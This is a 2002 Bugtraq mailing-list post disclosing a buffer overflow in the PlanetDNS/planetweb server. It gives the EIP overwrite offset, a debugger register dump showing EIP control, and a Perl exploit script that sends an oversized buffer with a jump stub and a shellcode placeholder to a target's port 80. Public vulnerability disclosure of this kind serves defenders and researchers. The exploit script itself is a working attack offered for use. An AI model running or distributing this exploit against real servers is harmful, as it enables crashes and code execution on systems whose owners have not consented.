[27494] in bugtraq
New buffer overflow in PlanetDNS
daemon@ATHENA.MIT.EDU (securma massine)
Fri Oct 18 13:04:12 2002
From: securma massine <securma@caramail.com>
To: bugtraq@securityfocus.com
Message-ID: <1034935247027123@caramail.com>
Mime-Version: 1.0
Date: Fri, 18 Oct 2002 12:00:47 GMT+1
Content-Type: multipart/mixed; boundary="=_NextPart_Caramail_0271231034935247_ID"
--=_NextPart_Caramail_0271231034935247_ID
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
hi
planetdns ( http://www.planetdns.net)is
commercial software package that allows to
turn computer into an Internet server.
and be able to create an Internet Name, connect to
a web server, FTP, mail server, etc. running
on computer.
planetdns is vulnerable has a buffer overflow with a
overwrite of eip (never posted before )... one already
notified that a number of 1024 byte could crasher the
server, and I found that while sending (without GET/)un of
6500 byte could thus make a overwrite eip of execution of a
shellcode, the overwrite is done with byte 6449, 50, 51,
52.
one notices of aillor that ebx and always 4byte before the
eip the ret address will be thus a jmp ebx or call ebx that
one finds in many modules charged .
I realised an exploit tested on plaetweb v1.14 and who
gives L state of the following registers:
Access violation - code c0000005 (first chance)
eax=3D0217dfb0 ebx=3D0217ffdc ecx=3D43434343 edx=3D7846f5b5
esi=3D0217dfd8 edi=3D00000000
eip=3D43434343 esp=3D0217df18 ebp=3D0217df38 iopl=3D0 nv up
ei pl zr na po nc
cs=3D001b ss=3D0023 ds=3D0023 es=3D0023 fs=3D003b
gs=3D0000 efl=3D00000246
43434343 ?? ???
exploit code:
#!/usr/bin/perl -w
#tool bop.pl
# buffer overflow tested against plaetweb v1.14
# humm..this exploit is not for lamers...
# Greetz: marocit and #crack.fr (specialemet
christal...plus tu p=E9dales moins fort, moins tu #avances
plus vite..)
#
use IO::Socket;
if ($#ARGV<0)
{
print "\n write the target IP!! \n\n";
exit;
}
$shellcode =3D
("YOURFAVORITSHELLCODEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");#ad
d your favorit shellcode
$buffer =3D "A"x6444;
$ebx =3D "\x90\xEB\x08\x90";# you have the chance because ebx
=3D eip - 4 bytes jmp short 0xff x0d3
$ret =3D "\x43\x43\x43\x43";# insert your ret address with
(jmp ebx or call ebx)
$minibuf =3D"\x90\x90\x90\x90";# will be jumped by EB08
$connect =3D IO::Socket::INET ->new (Proto=3D>"tcp",
PeerAddr=3D> "$ARGV[0]",
PeerPort=3D>"80"); unless ($connect) { die "cant connect $ARGV
[0]" }
print $connect "$buffer$ebx$ret$minibuf$shellcode";
print "\nsending exploit......\n\n";
_________________________________________________________
Gagnes une PS2 ! Envoies un SMS avec le code PS au 61166
(0,34€ Hors co=FBt du SMS)
--=_NextPart_Caramail_0271231034935247_ID--
